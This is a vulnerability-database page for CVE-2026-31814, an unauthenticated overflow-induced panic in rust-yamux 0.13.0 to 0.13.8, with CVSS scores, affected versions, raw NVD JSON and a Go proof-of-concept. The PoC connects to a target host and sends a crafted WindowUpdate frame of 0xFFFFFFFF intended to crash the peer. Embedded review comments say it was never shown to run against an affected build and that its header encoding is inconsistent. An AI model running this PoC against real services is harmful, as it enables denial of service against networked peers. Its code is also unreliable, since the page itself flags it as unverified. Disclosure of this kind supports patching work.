Security Vulnerability Report
CVE-2026-31814 CVSS 7.5 HIGH

CVE-2026-31814

Published: 2026-03-13 19:54:36
Last Modified: 2026-03-19 13:51:44

Description

Yamux is a stream multiplexer over reliable, ordered connections such as TCP/IP. From 0.13.0 to before 0.13.9, a specially crafted WindowUpdate can cause arithmetic overflow in send-window accounting, which triggers a panic in the connection state machine. This is remotely reachable over a normal network connection and does not require authentication. This vulnerability is fixed in 0.13.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:protocol:yamux:*:*:*:*:*:rust:*:* - VULNERABLE
libp2p/rust-yamux >= 0.13.0, < 0.13.9
Yamux 0.13.0
Yamux 0.13.1
Yamux 0.13.2
Yamux 0.13.3
Yamux 0.13.4
Yamux 0.13.5
Yamux 0.13.6
Yamux 0.13.7
Yamux 0.13.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
// CVE-2026-31814 PoC - Yamux WindowUpdate Arithmetic Overflow
// This PoC demonstrates sending a malicious WindowUpdate frame to trigger overflow
//
// Scope, as stated on the page: the affected product is libp2p/rust-yamux
// >= 0.13.0, < 0.13.9; the reported effect is a panic in the connection state
// machine (availability only, CVSS:3.1 A:H with C:N/I:N). The fix is 0.13.9.
// This Go program is only a TCP client that writes bytes to a peer.
//
// NOTE(review): nothing on the page shows this listing was run against an
// affected build, and the header encoding is not consistent across the
// listing. Do not read a "no crash" result from it as evidence that a
// deployment is patched; establish exposure from the resolved rust-yamux
// version in the dependency tree instead.
package main

import (
	"encoding/binary"
	"fmt"
	"net"
	"time"
)

const (
	// Yamux message types
	// NOTE(review): value as given by the page; not checked here against the
	// yamux specification.
	msgWindowUpdate = 0x02

	// Flags
	// Only flagSYN and flagACK are referenced in this listing; flagFIN and
	// flagRST are declared but unused.
	flagSYN = 0x01
	flagACK = 0x02
	flagFIN = 0x04
	flagRST = 0x08
)

// createMaliciousWindowUpdate returns a 16-byte slice: a 12-byte header built
// from the arguments followed by windowSize as a 4-byte big-endian value.
// The header's length field is always written as 4.
func createMaliciousWindowUpdate(streamID uint32, windowSize uint32) []byte {
	// Frame header: version(1) + type(1) + flags(2) + streamID(4) + length(4)
	frame := make([]byte, 12)
	frame[0] = 0x01                                  // Version
	frame[1] = msgWindowUpdate                       // Type: WindowUpdate
	binary.BigEndian.PutUint16(frame[2:4], flagACK)  // Flags
	binary.BigEndian.PutUint32(frame[4:8], streamID) // Stream ID
	binary.BigEndian.PutUint32(frame[8:12], 4)       // Payload length

	// Payload: the caller-supplied window increment, big-endian.
	payload := make([]byte, 4)
	binary.BigEndian.PutUint32(payload, windowSize) // Trigger overflow
	return append(frame, payload...)
}

// exploit opens a TCP connection to target:port (10 s dial timeout), writes
// three frames in sequence and returns nil once the last write succeeds.
// It returns an error only for a failed dial, a failed first write, or a
// failed last write. It never inspects the peer after the final write, so a
// nil return says nothing about whether the peer was affected.
func exploit(target string, port int) error {
	addr := fmt.Sprintf("%s:%d", target, port)
	conn, err := net.DialTimeout("tcp", addr, 10*time.Second)
	if err != nil {
		return fmt.Errorf("connection failed: %v", err)
	}
	defer conn.Close()

	// Step 1: Establish yamux session with SYN
	// The frame is a hand-written 12-byte literal, not built by the helper above.
	synFrame := []byte{0x01, 0x00, flagSYN, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04}
	if _, err := conn.Write(synFrame); err != nil {
		return fmt.Errorf("SYN send failed: %v", err)
	}

	// Step 2: Wait for ACK
	// The results of SetReadDeadline and Read are discarded, so execution
	// continues whether or not the peer replied, and the reply is never parsed.
	buf := make([]byte, 1024)
	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	conn.Read(buf)

	// Step 3: Create stream
	// Write and Read results are discarded here as well. The read deadline set
	// in step 2 is an absolute time and is not renewed before this Read.
	synWriteFrame := []byte{0x01, 0x00, flagSYN, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00}
	conn.Write(synWriteFrame)
	conn.Read(buf)

	// Step 4: Send malicious WindowUpdate to trigger arithmetic overflow
	// Use maximum uint32 value to maximize overflow probability
	maliciousFrame := createMaliciousWindowUpdate(1, 0xFFFFFFFF)
	fmt.Printf("Sending malicious WindowUpdate frame...\n")
	if _, err := conn.Write(maliciousFrame); err != nil {
		return fmt.Errorf("malicious frame send failed: %v", err)
	}
	// This message is printed unconditionally after a successful write; the
	// code does not check the peer's state.
	fmt.Printf("Malicious frame sent. Target may panic.\n")
	return nil
}

// main calls exploit with a hard-coded placeholder host name and port 8080 and
// prints any returned error; it takes no command-line arguments.
func main() {
	target := "target-host"
	port := 8080
	fmt.Printf("CVE-2026-31814 PoC - Yamux Arithmetic Overflow\n")
	if err := exploit(target, port); err != nil {
		fmt.Printf("Error: %v\n", err)
	}
}

References

https://github.com/libp2p/rust-yamux/security/advisories/GHSA-4w32-2493-32g7 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31814", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:36.470", "lastModified": "2026-03-19T13:51:44.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Yamux is a stream multiplexer over reliable, ordered connections such as TCP/IP. From 0.13.0 to before 0.13.9, a specially crafted WindowUpdate can cause arithmetic overflow in send-window accounting, which triggers a panic in the connection state machine. This is remotely reachable over a normal network connection and does not require authentication. This vulnerability is fixed in 0.13.9."}, {"lang": "es", "value": "Yamux es un multiplexor de flujo sobre conexiones fiables y ordenadas como TCP/IP. Desde 0.13.0 hasta antes de 0.13.9, una WindowUpdate especialmente diseñada puede causar un desbordamiento aritmético en la contabilidad de la ventana de envío, lo que desencadena un pánico en la máquina de estados de la conexión. Esto es alcanzable remotamente a través de una conexión de red normal y no requiere autenticación. 
Esta vulnerabilidad está corregida en 0.13.9."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": 
"NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:protocol:yamux:*:*:*:*:*:rust:*:*", "versionStartIncluding": "0.13.0", "versionEndExcluding": "0.13.9", "matchCriteriaId": "86BA699D-3FED-46FB-943E-FCB96C23DDBB"}]}]}], "references": [{"url": "https://github.com/libp2p/rust-yamux/security/advisories/GHSA-4w32-2493-32g7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}